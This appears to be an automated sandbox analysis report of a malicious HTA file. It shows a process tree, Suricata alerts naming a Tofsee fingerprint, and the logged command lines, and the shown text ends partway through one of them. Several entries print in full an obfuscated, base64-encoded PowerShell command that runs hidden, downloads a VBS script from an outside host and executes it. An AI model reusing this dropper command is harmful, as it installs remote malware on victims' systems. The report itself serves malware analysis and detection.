Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Sept. 19, 2023, 6:30 p.m. | Sept. 19, 2023, 6:33 p.m. |
-
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\HTML.hta.html
2412-
-
cmd.exe "C:\Windows\system32\cmd.exe" "/C powERsheLL.ExE -EX BypaSS -NOp -W HiDdEN -eC IAAJAAkACQAJAFsATgBlAHQALgBzAEUAUgBWAGkAYwBlAHAAbwBpAE4AVABNAGEAbgBhAEcARQBSAF0AOgA6AHMARQBjAFUAUgBJAHQAWQBwAHIATwB0AE8AYwBPAEwAIAAgACAAIAAgACAAIAA9ACAACQAgAAkACQAgAAkACQAgAAkAIAAgAFsAbgBlAFQALgBTAEUAQwBVAFIAaQBUAFkAcAByAE8AdABPAEMATwBsAHQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdwBHAGUAVAAgACAAIAAoAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAwADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADIAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQAOQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADYAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAyACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADUAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAMwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADAANQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADAAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMAAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAMQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcAMgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAOAA0ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA3ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAOQA4ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANQAgAAkAIAAgACAACQAJAAkAIAAJACkAIAAJAAkAIAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAJAC0AbwB1AHQARgBpAGwAZQAgACAACQAJACAAIAAJACAACQAJAB0gJABFAG4AVgA6AEEAcABwAEQAYQB0AEEAXABIAFQATQBMAC4AdgBiAHMAHSAgACAACQAJACAACQAgACAACQAgACAACQAJACAACQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAdABBAFIAVAAgACAAIAAgACAAIAAgACAAHSAkAEUAbgB2ADoAQQBQAFAARABhAFQAYQBcAEgAVABNAEwALgB2AGIAcwAdIA== "
2808-
powershell.exe powERsheLL.ExE -EX BypaSS -NOp -W HiDdEN -eC IAAJAAkACQAJAFsATgBlAHQALgBzAEUAUgBWAGkAYwBlAHAAbwBpAE4AVABNAGEAbgBhAEcARQBSAF0AOgA6AHMARQBjAFUAUgBJAHQAWQBwAHIATwB0AE8AYwBPAEwAIAAgACAAIAAgACAAIAA9ACAACQAgAAkACQAgAAkACQAgAAkAIAAgAFsAbgBlAFQALgBTAEUAQwBVAFIAaQBUAFkAcAByAE8AdABPAEMATwBsAHQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdwBHAGUAVAAgACAAIAAoAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAwADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADIAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQAOQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADYAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAyACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADUAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAMwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADAANQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADAAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMAAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAMQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcAMgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAOAA0ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA3ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAOQA4ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANQAgAAkAIAAgACAACQAJAAkAIAAJACkAIAAJAAkAIAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAJAC0AbwB1AHQARgBpAGwAZQAgACAACQAJACAAIAAJACAACQAJAB0gJABFAG4AVgA6AEEAcABwAEQAYQB0AEEAXABIAFQATQBMAC4AdgBiAHMAHSAgACAACQAJACAACQAgACAACQAgACAACQAJACAACQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAdABBAFIAVAAgACAAIAAgACAAIAAgACAAHSAkAEUAbgB2ADoAQQBQAFAARABhAFQAYQBcAEgAVABNAEwALgB2AGIAcwAdIA== "
2868
-
-
-
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49172 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49173 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 117.18.232.200:443 -> 192.168.56.103:49174 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
file | C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\System32\cmd.exe "/C powERsheLL.ExE -EX BypaSS -NOp -W HiDdEN -eC IAAJAAkACQAJAFsATgBlAHQALgBzAEUAUgBWAGkAYwBlAHAAbwBpAE4AVABNAGEAbgBhAEcARQBSAF0AOgA6AHMARQBjAFUAUgBJAHQAWQBwAHIATwB0AE8AYwBPAEwAIAAgACAAIAAgACAAIAA9ACAACQAgAAkACQAgAAkACQAgAAkAIAAgAFsAbgBlAFQALgBTAEUAQwBVAFIAaQBUAFkAcAByAE8AdABPAEMATwBsAHQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdwBHAGUAVAAgACAAIAAoAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAwADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADIAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQAOQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADYAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAyACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADUAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAMwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADAANQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADAAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMAAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAMQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcAMgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAOAA0ACAAC